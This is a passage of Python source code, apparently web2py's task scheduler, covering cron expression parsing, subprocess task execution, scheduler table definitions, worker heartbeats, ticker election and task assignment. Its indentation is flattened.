daysofweek = {'sun': 0, 'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4,
'fri': 5, 'sat': 6}
monthsofyear = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5,
'jun': 6, 'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10,
'nov': 11, 'dec': 12}
for (s, i) in zip(params, ('min', 'hr', 'dom', 'mon', 'dow')):
if s != '*':
task[i] = []
vals = s.split(',')
for val in vals:
if i == 'dow':
refdict = daysofweek
elif i == 'mon':
refdict = monthsofyear
if i in ('dow', 'mon') and '-' in val and '/' not in val:
isnum = val.split('-')[0].isdigit()
if isnum:
val = '%s/1' % val
else:
val = '-'.join([str(refdict.get(v, ''))
for v in val.split('-')])
if '-' in val and '/' not in val:
val = '%s/1' % val
if '/' in val:
task[i] += self._rangetolist(val, i)
elif val.isdigit():
task[i].append(int(val))
elif i in ('dow', 'mon'):
if val in refdict:
task[i].append(refdict[val])
elif i == 'dom' and val == 'l':
task[i].append(val)
if not task[i]:
raise ValueError('Invalid cron value (%s)' % s)
if not self._sanitycheck(task[i], i):
raise ValueError('Invalid cron value (%s)' % s)
task[i] = sorted(task[i])
self.task = task
@staticmethod
def _get_next_dow(sched, task):
task_dow = [a % 7 for a in task['dow']]
while sched.isoweekday() % 7 not in task_dow:
sched += datetime.timedelta(days=1)
return sched
@staticmethod
def _get_next_dom(sched, task):
if task['dom'] == ['l']:
# instead of calendar.isleap
try:
last_feb = 29
datetime.date(sched.year, 2, last_feb)
except ValueError:
last_feb = 28
lastdayofmonth = [
31, last_feb, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31
]
task_dom = [lastdayofmonth[sched.month - 1]]
else:
task_dom = task['dom']
while sched.day not in task_dom:
sched += datetime.timedelta(days=1)
return sched
@staticmethod
def _get_next_mon(sched, task):
while sched.month not in task['mon']:
if sched.month < 12:
sched = sched.replace(month=sched.month + 1)
else:
sched = sched.replace(month=1, year=sched.year + 1)
return sched
@staticmethod
def _getnext_hhmm(sched, task, add_to=True):
if add_to:
sched += datetime.timedelta(minutes=1)
if 'min' in task:
while sched.minute not in task['min']:
sched += datetime.timedelta(minutes=1)
if 'hr' in task and sched.hour not in task['hr']:
while sched.hour not in task['hr']:
sched += datetime.timedelta(hours=1)
return sched
def _getnext_date(self, sched, task):
if 'dow' in task and 'dom' in task:
dow = self._get_next_dow(sched, task)
dom = self._get_next_dom(sched, task)
sched = min(dow, dom)
elif 'dow' in task:
sched = self._get_next_dow(sched, task)
elif 'dom' in task:
sched = self._get_next_dom(sched, task)
if 'mon' in task:
sched = self._get_next_mon(sched, task)
return sched.replace(hour=0, minute=0)
def next(self):
"""Get next date according to specs."""
if not self.task:
self._parse()
task = self.task
sched = self.sched
x = 0
while x < 1000: # avoid potential max recursions
x += 1
try:
next_date = self._getnext_date(sched, task)
except (ValueError, OverflowError) as e:
raise ValueError('Invalid cron expression (%s)' % e)
if next_date.date() > self.sched.date():
# we rolled date, check for valid hhmm
sched = self._getnext_hhmm(next_date, task, False)
break
else:
# same date, get next hhmm
sched_time = self._getnext_hhmm(sched, task, True)
if sched_time.date() > sched.date():
# we rolled date again :(
sched = sched_time
else:
sched = sched_time
break
else:
raise ValueError('Potential bug found, please submit your '
'cron expression to the authors')
self.sched = sched
return sched
def __iter__(self):
"""Support iteration."""
return self
__next__ = next
# the two functions below deal with simplejson decoding as unicode,
# esp for the dict decode and subsequent usage as function Keyword arguments
# unicode variable names won't work!
# borrowed from http://stackoverflow.com/questions/956867/
def _decode_list(lst):
if not PY2:
return lst
newlist = []
for i in lst:
if isinstance(i, string_types):
i = to_bytes(i)
elif isinstance(i, list):
i = _decode_list(i)
newlist.append(i)
return newlist
def _decode_dict(dct):
if not PY2:
return dct
newdict = {}
for k, v in iteritems(dct):
k = to_bytes(k)
if isinstance(v, string_types):
v = to_bytes(v)
elif isinstance(v, list):
v = _decode_list(v)
newdict[k] = v
return newdict
def executor(retq, task, outq):
"""The function used to execute tasks in the background process."""
logger.debug(' task started')
class LogOutput(object):
"""Facility to log output at intervals."""
def __init__(self, out_queue):
self.out_queue = out_queue
self.stdout = sys.stdout
self.written = False
sys.stdout = self
def close(self):
sys.stdout = self.stdout
if self.written:
# see "Joining processes that use queues" section in
# https://docs.python.org/2/library/multiprocessing.html#programming-guidelines
# https://docs.python.org/3/library/multiprocessing.html#programming-guidelines
self.out_queue.cancel_join_thread()
def flush(self):
pass
def write(self, data):
self.out_queue.put(data)
self.written = True
W2P_TASK = Storage({
'id': task.task_id,
'uuid': task.uuid,
'run_id': task.run_id
})
stdout = LogOutput(outq)
try:
if task.app:
from gluon.shell import env, parse_path_info
from gluon import current
## FIXME: why temporarily change the log level of the root logger?
#level = logging.getLogger().getEffectiveLevel()
#logging.getLogger().setLevel(logging.WARN)
# support for task.app like 'app/controller'
(a, c, f) = parse_path_info(task.app)
_env = env(a=a, c=c, import_models=True,
extra_request={'is_scheduler': True})
#logging.getLogger().setLevel(level)
f = task.function
functions = current._scheduler.tasks
if functions:
_function = functions.get(f)
else:
# look into env
_function = _env.get(f)
if not isinstance(_function, CALLABLETYPES):
raise NameError(
"name '%s' not found in scheduler's environment" % f)
# Inject W2P_TASK into environment
_env.update({'W2P_TASK': W2P_TASK})
# Inject W2P_TASK into current
current.W2P_TASK = W2P_TASK
globals().update(_env)
args = _decode_list(loads(task.args))
vars = loads(task.vars, object_hook=_decode_dict)
result = dumps(_function(*args, **vars))
else:
# for testing purpose only
result = eval(task.function)(
*loads(task.args, object_hook=_decode_dict),
**loads(task.vars, object_hook=_decode_dict))
if len(result) >= 1024:
fd, temp_path = tempfile.mkstemp(suffix='.w2p_sched')
with os.fdopen(fd, 'w') as f:
f.write(result)
result = RESULTINFILE + temp_path
retq.put(TaskReport('COMPLETED', result=result))
except:
tb = traceback.format_exc()
retq.put(TaskReport('FAILED', tb=tb))
finally:
stdout.close()
class IS_CRONLINE(object):
"""
Validates cronline
"""
def __init__(self, error_message=None):
self.error_message = error_message
def __call__(self, value, record_id=None):
recur = CronParser(value, datetime.datetime.now())
try:
recur.next()
return (value, None)
except ValueError as e:
if not self.error_message:
return (value, e)
return (value, self.error_message)
class TYPE(object):
"""
Validator that checks whether field is valid json and validates its type.
Used for `args` and `vars` of the scheduler_task table
"""
def __init__(self, myclass=list, parse=False):
self.myclass = myclass
self.parse = parse
def __call__(self, value, record_id=None):
from gluon import current
try:
obj = loads(value)
except:
return (value, current.T('invalid json'))
else:
if isinstance(obj, self.myclass):
if self.parse:
return (obj, None)
else:
return (value, None)
else:
return (value, current.T('Not of type: %s') % self.myclass)
TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED)
RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED)
WORKER_STATUS = (ACTIVE, PICK, DISABLED, TERMINATE, KILL, STOP_TASK)
class Scheduler(threading.Thread):
"""Scheduler object
Args:
db: DAL connection where Scheduler will create its tables
tasks(dict): either a dict containing name-->func or None.
If None, functions will be searched in the environment
migrate(bool): turn migration on/off for the Scheduler's tables
worker_name(str): force worker_name to identify each process.
Leave it to None to autoassign a name (hostname#pid)
group_names(list): process tasks belonging to this group
defaults to ['main'] if nothing gets passed
heartbeat(int): how many seconds the worker sleeps between one
execution and the following one. Indirectly sets how many seconds
will pass between checks for new tasks
max_empty_runs(int): how many loops are allowed to pass without
processing any tasks before exiting the process. 0 to keep always
the process alive
discard_results(bool): Scheduler stores executions's details into the
scheduler_run table. By default, only if there is a result the
details are kept. Turning this to True means discarding results
even for tasks that return something
utc_time(bool): do all datetime calculations assuming UTC as the
timezone. Remember to pass `start_time` and `stop_time` to tasks
accordingly
"""
def __init__(self, db, tasks=None, migrate=True,
worker_name=None, group_names=None, heartbeat=HEARTBEAT,
max_empty_runs=0, discard_results=False, utc_time=False):
threading.Thread.__init__(self)
self.setDaemon(True)
self.process = None # the background process
self.process_queues = (None, None)
self.have_heartbeat = True # set to False to kill
self.empty_runs = 0
self.db = db
self.db_thread = None
self.tasks = tasks
self.group_names = group_names or ['main']
self.heartbeat = heartbeat
self.worker_name = worker_name or IDENTIFIER
self.max_empty_runs = max_empty_runs
self.discard_results = discard_results
self.is_a_ticker = False
self.do_assign_tasks = False
self.greedy = False
self.utc_time = utc_time
self.w_stats_lock = threading.RLock()
self.w_stats = Storage(
dict(
status=RUNNING,
sleep=heartbeat,
total=0,
errors=0,
empty_runs=0,
queue=0,
distribution=None,
workers=0)
) # dict holding statistics
from gluon import current
current._scheduler = self
self.define_tables(db, migrate=migrate)
def execute(self, task):
"""Start the background process.
Args:
task : a `Task` object
Returns:
a `TaskReport` object
"""
outq = multiprocessing.Queue()
retq = multiprocessing.Queue(maxsize=1)
self.process = p = \
multiprocessing.Process(target=executor, args=(retq, task, outq))
self.process_queues = (retq, outq)
logger.debug(' task starting')
p.start()
start = time.time()
if task.sync_output > 0:
run_timeout = task.sync_output
else:
run_timeout = task.timeout
task_output = tout = ''
try:
while p.is_alive() and (not task.timeout or
time.time() - start < task.timeout):
# NOTE: try always to empty the out queue before
# the child process is joined,
# see "Joining processes that use queues" section in
# https://docs.python.org/2/library/multiprocessing.html#programming-guidelines
# https://docs.python.org/3/library/multiprocessing.html#programming-guidelines
while True:
try:
tout += outq.get(timeout=2)
except Queue.Empty:
break
if tout:
logger.debug(' partial output: "%s"', tout)
if CLEAROUT in tout:
task_output = tout[
tout.rfind(CLEAROUT) + len(CLEAROUT):]
else:
task_output += tout
try:
db = self.db
db(db.scheduler_run.id == task.run_id).update(run_output=task_output)
db.commit()
tout = ''
logger.debug(' partial output saved')
except Exception:
logger.exception(' error while saving partial output')
task_output = task_output[:-len(tout)]
p.join(timeout=run_timeout)
except:
logger.exception(' task stopped by general exception')
self.terminate_process()
tr = TaskReport(STOPPED)
else:
if p.is_alive():
logger.debug(' task timeout')
self.terminate_process(flush_ret=False)
try:
# we try to get a traceback here
tr = retq.get(timeout=2) # NOTE: risky after terminate
tr.status = TIMEOUT
tr.output = task_output
except Queue.Empty:
tr = TaskReport(TIMEOUT)
else:
try:
tr = retq.get_nowait()
except Queue.Empty:
logger.debug(' task stopped')
tr = TaskReport(STOPPED)
else:
logger.debug(' task completed or failed')
result = tr.result
if result and result.startswith(RESULTINFILE):
temp_path = result.replace(RESULTINFILE, '', 1)
with open(temp_path) as f:
tr.result = f.read()
os.unlink(temp_path)
tr.output = task_output
return tr
_terminate_process_lock = threading.RLock()
def terminate_process(self, flush_out=True, flush_ret=True):
"""Terminate any running tasks (internal use only)"""
if self.process is not None:
# must synchronize since we are called by main and heartbeat thread
with self._terminate_process_lock:
if flush_out:
queue = self.process_queues[1]
while not queue.empty(): # NOTE: empty() is not reliable
try:
queue.get_nowait()
except Queue.Empty:
pass
if flush_ret:
queue = self.process_queues[0]
while not queue.empty():
try:
queue.get_nowait()
except Queue.Empty:
pass
logger.debug('terminating process')
try:
# NOTE: terminate should not be called when using shared
# resources, see "Avoid terminating processes"
# section in
# https://docs.python.org/2/library/multiprocessing.html#programming-guidelines
# https://docs.python.org/3/library/multiprocessing.html#programming-guidelines
self.process.terminate()
# NOTE: calling join after a terminate is risky,
# as explained in "Avoid terminating processes"
# section this can lead to a deadlock
self.process.join()
finally:
self.process = None
def die(self):
"""Forces termination of the worker process along with any running
task"""
logger.info('die!')
self.have_heartbeat = False
self.terminate_process()
def give_up(self):
"""Waits for any running task to be executed, then exits the worker
process"""
logger.info('Giving up as soon as possible!')
self.have_heartbeat = False
def run(self):
"""This is executed by the heartbeat thread"""
counter = 0
while self.have_heartbeat:
self.send_heartbeat(counter)
counter += 1
def start_heartbeats(self):
self.start()
def __get_migrate(self, tablename, migrate=True):
if migrate is False:
return False
elif migrate is True:
return True
elif isinstance(migrate, str):
return "%s%s.table" % (migrate, tablename)
return True
def now(self):
"""Shortcut that fetches current time based on UTC preferences."""
return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now()
def set_requirements(self, scheduler_task):
"""Called to set defaults for lazy_tables connections."""
from gluon import current
if hasattr(current, 'request'):
scheduler_task.application_name.default = '%s/%s' % (
current.request.application, current.request.controller
)
def define_tables(self, db, migrate):
"""Define Scheduler tables structure."""
from pydal.base import DEFAULT
logger.debug('defining tables (migrate=%s)', migrate)
now = self.now
db.define_table(
'scheduler_task',
Field('application_name', requires=IS_NOT_EMPTY(),
default=None, writable=False),
Field('task_name', default=None),
Field('group_name', default='main'),
Field('status', requires=IS_IN_SET(TASK_STATUS),
default=QUEUED, writable=False),
Field('broadcast', 'boolean', default=False),
Field('function_name',
requires=IS_IN_SET(sorted(self.tasks.keys()))
if self.tasks else DEFAULT),
Field('uuid', length=255,
requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'),
unique=True, default=web2py_uuid),
Field('args', 'text', default='[]', requires=TYPE(list)),
Field('vars', 'text', default='{}', requires=TYPE(dict)),
Field('enabled', 'boolean', default=True),
Field('start_time', 'datetime', default=now,
requires=IS_DATETIME()),
Field('next_run_time', 'datetime', default=now),
Field('stop_time', 'datetime'),
Field('repeats', 'integer', default=1, comment="0=unlimited",
requires=IS_INT_IN_RANGE(0, None)),
Field('retry_failed', 'integer', default=0, comment="-1=unlimited",
requires=IS_INT_IN_RANGE(-1, None)),
Field('period', 'integer', default=60, comment='seconds',
requires=IS_INT_IN_RANGE(0, None)),
Field('prevent_drift', 'boolean', default=False,
comment='Exact start_times between runs'),
Field('cronline', default=None,
comment='Discard "period", use this cron expr instead',
requires=IS_EMPTY_OR(IS_CRONLINE())),
Field('timeout', 'integer', default=60, comment='seconds',
requires=IS_INT_IN_RANGE(1, None)),
Field('sync_output', 'integer', default=0,
comment="update output every n sec: 0=never",
requires=IS_INT_IN_RANGE(0, None)),
Field('times_run', 'integer', default=0, writable=False),
Field('times_failed', 'integer', default=0, writable=False),
Field('last_run_time', 'datetime', writable=False, readable=False),
Field('assigned_worker_name', default='', writable=False),
on_define=self.set_requirements,
migrate=self.__get_migrate('scheduler_task', migrate),
format='(%(id)s) %(task_name)s')
db.define_table(
'scheduler_run',
Field('task_id', 'reference scheduler_task'),
Field('status', requires=IS_IN_SET(RUN_STATUS)),
Field('start_time', 'datetime'),
Field('stop_time', 'datetime'),
Field('run_output', 'text'),
Field('run_result', 'text'),
Field('traceback', 'text'),
Field('worker_name', default=self.worker_name),
migrate=self.__get_migrate('scheduler_run', migrate)
)
db.define_table(
'scheduler_worker',
Field('worker_name', length=255, unique=True),
Field('first_heartbeat', 'datetime'),
Field('last_heartbeat', 'datetime'),
Field('status', requires=IS_IN_SET(WORKER_STATUS)),
Field('is_ticker', 'boolean', default=False, writable=False),
Field('group_names', 'list:string', default=self.group_names),
Field('worker_stats', 'json'),
migrate=self.__get_migrate('scheduler_worker', migrate)
)
db.define_table(
'scheduler_task_deps',
Field('job_name', default='job_0'),
Field('task_parent', 'integer',
requires=IS_IN_DB(db, 'scheduler_task.id', '%(task_name)s')
),
Field('task_child', 'reference scheduler_task'),
Field('can_visit', 'boolean', default=False),
migrate=self.__get_migrate('scheduler_task_deps', migrate)
)
if migrate is not False:
db.commit()
def loop(self, worker_name=None):
"""Main loop.
This works basically as a neverending loop that:
- checks if the worker is ready to process tasks (is not DISABLED)
- pops a task from the queue
- if there is a task:
- spawns the executor background process
- waits for the process to be finished
- sleeps `heartbeat` seconds
- if there is not a task:
- checks for max_empty_runs
- sleeps `heartbeat` seconds
"""
signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
try:
self.start_heartbeats()
while self.have_heartbeat:
with self.w_stats_lock:
is_disabled = self.w_stats.status == DISABLED
if is_disabled:
logger.debug('Someone stopped me, sleeping until better'
' times come (%s)', self.w_stats.sleep)
self.sleep()
continue
logger.debug('looping...')
if self.is_a_ticker and self.do_assign_tasks:
# I'm a ticker, and 5 loops passed without
# reassigning tasks, let's do that
self.wrapped_assign_tasks()
task = self.wrapped_pop_task()
if task:
with self.w_stats_lock:
self.w_stats.empty_runs = 0
self.w_stats.status = RUNNING
self.w_stats.total += 1
self.wrapped_report_task(task, self.execute(task))
with self.w_stats_lock:
if not self.w_stats.status == DISABLED:
self.w_stats.status = ACTIVE
else:
with self.w_stats_lock:
self.w_stats.empty_runs += 1
if self.max_empty_runs != 0:
logger.debug('empty runs %s/%s',
self.w_stats.empty_runs,
self.max_empty_runs)
if self.w_stats.empty_runs >= self.max_empty_runs:
logger.info(
'empty runs limit reached, killing myself')
self.die()
if self.is_a_ticker and self.greedy:
# there could be other tasks ready to be assigned
logger.info('TICKER: greedy loop')
self.wrapped_assign_tasks()
logger.debug('sleeping...')
self.sleep()
except (KeyboardInterrupt, SystemExit):
logger.info('catched')
self.die()
def wrapped_pop_task(self):
"""Commodity function to call `pop_task` and trap exceptions.
If an exception is raised, assume it happened because of database
contention and retries `pop_task` after 0.5 seconds
"""
db = self.db
db.commit() # for MySQL only; FIXME: Niphlod, still needed? could avoid when not MySQL?
for x in range(10):
try:
return self.pop_task()
except Exception:
logger.exception(' error popping tasks')
self.w_stats.errors += 1
db.rollback()
time.sleep(0.5)
def pop_task(self):
"""Grab a task ready to be executed from the queue."""
now = self.now()
db = self.db
st = db.scheduler_task
grabbed = db(
(st.assigned_worker_name == self.worker_name) &
(st.status == ASSIGNED)
)
task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first()
if task:
# none will touch my task!
task.update_record(status=RUNNING, last_run_time=now)
db.commit()
logger.debug(' work to do %s', task.id)
else:
logger.info('nothing to do')
return None
if task.cronline:
cron_recur = CronParser(task.cronline,
now.replace(second=0, microsecond=0))
next_run_time = cron_recur.next()
elif not task.prevent_drift:
next_run_time = task.last_run_time + datetime.timedelta(
seconds=task.period
)
else:
# calc next_run_time based on available slots
# see #1191
next_run_time = task.start_time
secondspassed = (now - next_run_time).total_seconds()
times = secondspassed // task.period + 1
next_run_time += datetime.timedelta(seconds=task.period * times)
times_run = task.times_run + 1
if times_run < task.repeats or task.repeats == 0:
# need to run (repeating task)
run_again = True
else:
# no need to run again
run_again = False
run_id = 0
while not self.discard_results: # FIXME: forever?
logger.debug(' new scheduler_run record')
try:
run_id = db.scheduler_run.insert(
task_id=task.id,
status=RUNNING,
start_time=now,
worker_name=self.worker_name)
db.commit()
break
except Exception:
logger.exception(' error inserting scheduler_run')
db.rollback()
time.sleep(0.5)
logger.info('new task %(id)s "%(task_name)s"'
' %(application_name)s.%(function_name)s' % task)
return Task(
app=task.application_name,
function=task.function_name,
timeout=task.timeout,
args=task.args, # in json
vars=task.vars, # in json
task_id=task.id,
run_id=run_id,
run_again=run_again,
next_run_time=next_run_time,
times_run=times_run,
stop_time=task.stop_time,
retry_failed=task.retry_failed,
times_failed=task.times_failed,
sync_output=task.sync_output,
uuid=task.uuid)
def wrapped_report_task(self, task, task_report):
"""Commodity function to call `report_task` and trap exceptions.
If an exception is raised, assume it happened because of database
contention and retries `pop_task` after 0.5 seconds
"""
db = self.db
while True: # FIXME: forever?
try:
self.report_task(task, task_report)
db.commit()
break
except Exception:
logger.exception(' error storing result')
db.rollback()
time.sleep(0.5)
def report_task(self, task, task_report):
"""Take care of storing the result according to preferences.
Deals with logic for repeating tasks.
"""
now = self.now()
db = self.db
st = db.scheduler_task
sr = db.scheduler_run
if not self.discard_results:
if task_report.result != 'null' or task_report.tb:
# result is 'null' as a string if task completed
# if it's stopped it's None as NoneType, so we record
# the STOPPED "run" anyway
logger.debug(' recording task report in db (%s)',
task_report.status)
db(sr.id == task.run_id).update(
status=task_report.status,
stop_time=now,
run_result=task_report.result,
run_output=task_report.output,
traceback=task_report.tb)
else:
logger.debug(' deleting task report in db because of no result')
db(sr.id == task.run_id).delete()
# if there is a stop_time and the following run would exceed it
is_expired = (task.stop_time and
task.next_run_time > task.stop_time or
False)
status = (task.run_again and is_expired and EXPIRED or
task.run_again and not is_expired and QUEUED or
COMPLETED)
if task_report.status == COMPLETED:
d = dict(status=status,
next_run_time=task.next_run_time,
times_run=task.times_run,
times_failed=0
)
db(st.id == task.task_id).update(**d)
if status == COMPLETED:
self.update_dependencies(task.task_id)
else:
st_mapping = {'FAILED': 'FAILED',
'TIMEOUT': 'TIMEOUT',
'STOPPED': 'FAILED'}[task_report.status]
status = (task.retry_failed
and task.times_failed < task.retry_failed
and QUEUED or task.retry_failed == -1
and QUEUED or st_mapping)
db(st.id == task.task_id).update(
times_failed=st.times_failed + 1,
next_run_time=task.next_run_time,
status=status
)
logger.info('task completed (%s)', task_report.status)
def update_dependencies(self, task_id):
"""Unblock execution paths for Jobs."""
db = self.db
db(db.scheduler_task_deps.task_child == task_id).update(can_visit=True)
def adj_hibernation(self):
"""Used to increase the "sleep" interval for DISABLED workers."""
with self.w_stats_lock:
if self.w_stats.status == DISABLED:
wk_st = self.w_stats.sleep
hibernation = wk_st + HEARTBEAT if wk_st < MAXHIBERNATION else MAXHIBERNATION
self.w_stats.sleep = hibernation
def send_heartbeat(self, counter):
"""Coordination among available workers.
It:
- sends the heartbeat
- elects a ticker among available workers (the only process that
effectively dispatch tasks to workers)
- deals with worker's statuses
- does "housecleaning" for dead workers
- triggers tasks assignment to workers
"""
if self.db_thread:
# BKR 20180612 check if connection still works
try:
self.db_thread(self.db_thread.scheduler_worker).count()
except self.db_thread._adapter.connection.OperationalError:
# if not -> throw away self.db_thread and force reconnect
self.db_thread = None
if not self.db_thread:
logger.debug('thread building own DAL object')
self.db_thread = DAL(
self.db._uri, folder=self.db._adapter.folder, decode_credentials=True)
self.define_tables(self.db_thread, migrate=False)
try:
now = self.now()
db = self.db_thread
sw = db.scheduler_worker
st = db.scheduler_task
# record heartbeat
row = db(sw.worker_name == self.worker_name).select().first()
with self.w_stats_lock:
if not row:
sw.insert(status=ACTIVE, worker_name=self.worker_name,
first_heartbeat=now, last_heartbeat=now,
group_names=self.group_names,
worker_stats=self.w_stats)
self.w_stats.status = ACTIVE
self.w_stats.sleep = self.heartbeat
backed_status = ACTIVE
else:
backed_status = row.status
if backed_status == DISABLED:
# keep sleeping
self.w_stats.status = DISABLED
logger.debug('........recording heartbeat (DISABLED)')
db(sw.worker_name == self.worker_name).update(
last_heartbeat=now,
worker_stats=self.w_stats)
elif backed_status == TERMINATE:
self.w_stats.status = TERMINATE
logger.debug("Waiting to terminate the current task")
self.give_up()
elif backed_status == KILL:
self.w_stats.status = KILL
self.die()
return
else:
if backed_status == STOP_TASK:
logger.info('Asked to kill the current task')
self.terminate_process()
logger.debug('........recording heartbeat (%s)',
self.w_stats.status)
db(sw.worker_name == self.worker_name).update(
last_heartbeat=now, status=ACTIVE,
worker_stats=self.w_stats)
self.w_stats.sleep = self.heartbeat # re-activating the process
if self.w_stats.status != RUNNING:
self.w_stats.status = ACTIVE
self.do_assign_tasks = False
if counter % 5 == 0 or backed_status == PICK:
try:
# delete dead workers
expiration = now - datetime.timedelta(
seconds=self.heartbeat * 3)
departure = now - datetime.timedelta(
seconds=self.heartbeat * 3 * 15)
logger.debug(
' freeing workers that have not sent heartbeat')
dead_workers = db(
((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) |
((sw.last_heartbeat < departure) & (sw.status != ACTIVE))
)
dead_workers_name = dead_workers._select(sw.worker_name)
db(
(st.assigned_worker_name.belongs(dead_workers_name)) &
(st.status == RUNNING)
).update(assigned_worker_name='', status=QUEUED)
dead_workers.delete()
try:
self.is_a_ticker = self.being_a_ticker()
except:
logger.exception('Error coordinating TICKER')
with self.w_stats_lock:
if self.w_stats.status == ACTIVE:
self.do_assign_tasks = True
except:
logger.exception('Error cleaning up')
db.commit()
except:
logger.exception('Error retrieving status')
db.rollback()
self.adj_hibernation()
self.sleep()
def being_a_ticker(self):
"""Elect a TICKER process that assigns tasks to available workers.
Does its best to elect a worker that is not busy processing other tasks
to allow a proper distribution of tasks among all active workers ASAP
"""
db = self.db_thread
sw = db.scheduler_worker
my_name = self.worker_name
all_active = db(
(sw.worker_name != my_name) & (sw.status == ACTIVE)
).select(sw.is_ticker, sw.worker_name)
ticker = all_active.find(lambda row: row.is_ticker is True).first()
with self.w_stats_lock:
not_busy = self.w_stats.status == ACTIVE
if not ticker:
# if no other tickers are around
if not_busy:
# only if I'm not busy
db(sw.worker_name == my_name).update(is_ticker=True)
db(sw.worker_name != my_name).update(is_ticker=False)
logger.info("TICKER: I'm a ticker")
else:
# I'm busy
if len(all_active) >= 1:
# so I'll "downgrade" myself to a "poor worker"
db(sw.worker_name == my_name).update(is_ticker=False)
else:
not_busy = True
db.commit()
return not_busy
else:
logger.info(
"%s is a ticker, I'm a poor worker" % ticker.worker_name)
return False
def wrapped_assign_tasks(self):
"""Commodity function to call `assign_tasks` and trap exceptions.
If an exception is raised, assume it happened because of database
contention and retries `assign_task` after 0.5 seconds
"""
logger.debug('Assigning tasks...')
db = self.db
db.commit() # for MySQL only; FIXME: Niphlod, still needed? could avoid when not MySQL?
for x in range(10):
try:
self.assign_tasks()
db.commit()
logger.debug('Tasks assigned...')
break
except Exception:
logger.exception('TICKER: error assigning tasks')
self.w_stats.errors += 1
db.rollback()
time.sleep(0.5)
def assign_tasks(self):
"""Assign task to workers, that can then pop them from the queue.
Deals with group_name(s) logic, in order to assign linearly tasks
to available workers for those groups
"""
now = self.now()
db = self.db
sw = db.scheduler_worker
st = db.scheduler_task
sd = db.scheduler_task_deps
all_workers = db(sw.status == ACTIVE).select()
# build workers as dict of groups
wkgroups = {}
for w in all_workers:
if w.worker_stats['status'] == 'RUNNING':
continue
group_names = w.group_names
for gname in group_names:
if gname not in wkgroups:
wkgroups[gname] = dict(
workers=[{'name': w.worker_name, 'c': 0}])
else:
wkgroups[gname]['workers'].append(
{'name': w.worker_name, 'c': 0})
# set queued tasks that expired between "runs" (i.e., you turned off
# the scheduler): then it wasn't expired, but now it is
db(
(st.status.belongs((QUEUED, ASSIGNED))) &
(st.stop_time < now)
).update(status=EXPIRED)
# calculate dependencies
deps_with_no_deps = db(
(sd.can_visit == False) &
(~sd.task_child.belongs(
db(sd.can_visit == False)._select(sd.task_parent)
)
)
)._select(sd.task_child)
no_deps = db(
(st.status.belongs((QUEUED, ASSIGNED))) &
(
(sd.id == None) | (st.id.belongs(deps_with_no_deps))
)
)._select(st.id, distinct=True, left=sd.on(
(st.id == sd.task_parent) &
(sd.can_visit == False)
)
)
all_available = db(
(st.status.belongs((QUEUED, ASSIGNED))) &
(st.next_run_time <= now) &
(st.enabled == True) &
(st.id.belongs(no_deps))
)
limit = len(all_workers) * (50 / (len(wkgroups) or 1))
# if there are a moltitude of tasks, let's figure out a maximum of
# tasks per worker. This can be further tuned with some added
# intelligence (like esteeming how many tasks will a worker complete
# before the ticker reassign them around, but the gain is quite small
# 50 is a sweet spot also for fast tasks, with sane heartbeat values
# NB: ticker reassign tasks every 5 cycles, so if a worker completes
# its 50 tasks in less than heartbeat*5 seconds,
# it won't pick new tasks until heartbeat*5 seconds pass.
# If a worker is currently elaborating a long task, its tasks needs to
# be reassigned to other workers
# this shuffles up things a bit, in order to give a task equal chances
# to be executed
# let's freeze it up
db.commit()
tnum = 0
for group in wkgroups.keys():
tasks = all_available(st.group_name == group).select(
limitby=(0, limit), orderby=st.next_run_time)
# let's break up the queue evenly among workers
for task in tasks:
tnum += 1
gname = task.group_name
ws = wkgroups.get(gname)
if ws:
if task.broadcast:
for worker in ws['workers']:
new_task = db.scheduler_task.insert(
application_name = task.application_name,
task_name = task.task_name,
group_name = task.group_name,
status = ASSIGNED,
broadcast = False,
function_name = task.function_name,
args = task.args,
start_time = now,
repeats = 1,
retry_failed = task.retry_failed,
sync_output = task.sync_output,
assigned_worker_name = worker['name'])
if task.period:
next_run_time = now+datetime.timedelta(seconds=task.period)
else:
# must be cronline
cron_recur = CronParser(task.cronline,
now.replace(second=0, microsecond=0))
next_run_time = cron_recur.next()
db(st.id == task.id).update(times_run=task.times_run+1,
next_run_time=next_run_time,
last_run_time=now)
db.commit()
else:
counter = 0
myw = 0
for i, w in enumerate(ws['workers']):
if w['c'] < counter:
myw = i
counter = w['c']
assigned_wn = wkgroups[gname]['workers'][myw]['name']
d = dict(
status=ASSIGNED,
assigned_worker_name=assigned_wn
)
db(
(st.id == task.id) &
(st.status.belongs((QUEUED, ASSIGNED)))
).update(**d)
wkgroups[gname]['workers'][myw]['c'] += 1
db.commit()
# I didn't report tasks but I'm working nonetheless!!!!
with self.w_stats_lock:
if tnum > 0:
self.w_stats.empty_runs = 0
self.w_stats.queue = tnum
self.w_stats.distribution = wkgroups
self.w_stats.workers = len(all_workers)
# I'll be greedy only if tasks assigned are equal to the limit
# (meaning there could be others ready to be assigned)
self.greedy = tnum >= limit
logger.info('TICKER: workers are %s', len(all_workers))
logger.info('TICKER: tasks are %s', tnum)
def sleep(self):
"""Calculate the number of seconds to sleep."""
time.sleep(self.w_stats.sleep)
# should only sleep until next available task
def set_worker_status(self, group_names=None, action=ACTIVE,
exclude=None, limit=None, worker_name=None):
"""Internal function to set worker's status."""
db = self.db
ws = db.scheduler_worker
if not group_names:
group_names = self.group_names
elif isinstance(group_names, str):
group_names = [group_names]
if worker_name:
db(ws.worker_name == worker_name).update(status=action)
return
exclusion = exclude and exclude.append(action) or [action]
if not limit:
for group in group_names:
db(
(ws.group_names.contains(group)) &
(~ws.status.belongs(exclusion))
).update(status=action)
else:
for group in group_names:
workers = db((ws.group_names.contains(group)) &
(~ws.status.belongs(exclusion))
)._select(ws.id, limitby=(0, limit))
db(ws.id.belongs(workers)).update(status=action)
def disable(self, group_names=None, limit=None, worker_name=None):
"""Set DISABLED on the workers processing `group_names` tasks.
A DISABLED worker will be kept alive but it won't be able to process
any waiting tasks, essentially putting it to sleep.
By default, all group_names of Scheduler's instantation are selected
"""
self.set_worker_status(
